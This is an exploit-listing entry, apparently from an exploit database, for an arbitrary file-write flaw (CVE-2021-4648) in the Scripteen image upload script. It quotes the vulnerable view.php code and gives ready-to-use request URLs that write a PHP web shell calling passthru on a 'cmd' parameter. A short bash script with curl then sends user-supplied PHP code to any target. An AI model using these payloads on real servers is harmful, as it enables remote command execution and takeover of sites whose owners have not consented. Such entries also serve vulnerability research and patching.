Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-4648 | CWE-434 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-10-23 |
[+] Exploit Title : Scripteen mage Upload Script Arbitrary File Injection [+] Venedor Home Page : https://scripteen.com/ [+] Author : z3r0fy [+] Twitter : z3r0fy [+] Website : www.bugcontainer.gq [+] Description : Due to these codes in the View.php file $home = fopen($_GET["file"], "w"); fwrite($home, $_GET["data"]); File can be written arbitrarily Exploit : /app/view.php?file=shell.php&data=<?php phpinfo();?> If you want to be made more offensive, app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?> After poc is applied, This way the command can be run on the server "shell.php?cmd=" [+] PoC : #!/bin/bash echo " __________ ____ ___ _______ __ |__ /___ /| _ \ / _ \| ___\ \ / / / / |_ \| |_) | | | | |_ \ V / / /_ ___) | _ <| |_| | _| | | /____|____/|_| \_\\___/|_| |_| " echo" " echo -n "[+] TARGET : " ;read hedef echo -n "[+] PHP Code : " ;read kod curl $hedef/app/view.php?file=shell.php&data=$kod
Copyright ©2024 Exploitalert.